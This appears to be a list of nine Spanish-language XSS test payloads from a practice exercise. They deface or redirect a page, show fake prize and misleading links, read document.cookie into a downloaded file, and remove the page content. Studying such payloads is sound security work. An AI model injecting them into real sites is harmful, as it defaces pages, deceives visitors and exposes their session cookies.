1:
<script>
let elem = "<h1 align='center' style='color:red;'><i>Esta pagina es vulnearable</i></h1>";
document.write(elem)
</script>

2:
<script>
alert("Estas siendo hackeado")
</script>

3:
<script>
let elem = "<h3><a style='color:red;' href='https://www.amazon.com.mx/'>Click aqui para ganar increibles premios!</a></h3>";
document.write(elem)
</script>

4:
<script>
document.write("<div id='blink' style='color:red; background-color:yellow; text-align:center'>Vulnerable a XSS CUIDADO!</div>");
let blinkdiv = document.getElementById('blink');
let isVisible = true;
setInterval(function(){if(isVisible){blink.style.visibility = 'hidden';} else {blink.style.visibility = 'visible';} isVisible=!isVisible;}, 500);
</script>

5:
<script>
document.location.replace('https://en.wikipedia.org/wiki/Cross-site_scripting')
</script>
codificado:
%3C%73%63%72%69%70%74%3E%0A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%27%68%74%74%70%73%3A%2F%2F%65%6E%2E%77%69%6B%69%70%65%64%69%61%2E%6F%72%67%2F%77%69%6B%69%2F%43%72%6F%73%73%2D%73%69%74%65%5F%73%63%72%69%70%74%69%6E%67%27%29%0A%3C%2F%73%63%72%69%70%74%3E

6:
<script>
function saveCookie(cookie) {
var blob = new Blob([cookie], { type: 'text/plain'});
var url  = URL.createObjectURL(blob);
var a    = document.createElement('a');
a.href   = url;
a.download = 'cookies.txt';
a.click();
URL.revokeObjectURL(url);
}
saveCookie(document.cookie);
</script>

7:
<p> Checa estos audifonos: <a href="https://www.youtube.com/watch?v=dQw4w9WgXcQ"> https://www.headphpnesultra.com/ </a>

8:
<script>alert("has sido hackeado");</script>

9: 
<script>document.getElementsByTagName('html')[0].remove();</script>
